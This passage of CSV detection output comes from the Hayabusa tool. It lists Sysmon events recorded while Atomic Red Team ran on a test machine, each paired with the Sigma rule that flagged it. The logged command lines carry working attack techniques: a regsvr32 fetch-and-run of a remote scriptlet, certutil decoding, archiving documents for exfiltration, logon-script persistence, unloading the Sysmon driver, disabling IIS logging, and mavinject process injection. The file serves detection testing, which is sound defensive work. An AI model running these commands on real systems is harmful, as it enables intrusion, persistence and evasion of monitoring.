+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp -a : Path: C:\Windows\System32\ARP.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.026 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -encode c:\file.exe file.txt : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser 
: Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -decode file.txt c:\file.exe : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil 
Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll : Path: C:\Windows\System32\mavinject.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT : Command: at 13:20 /interactive cmd : Path: C:\Windows\System32\at.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c 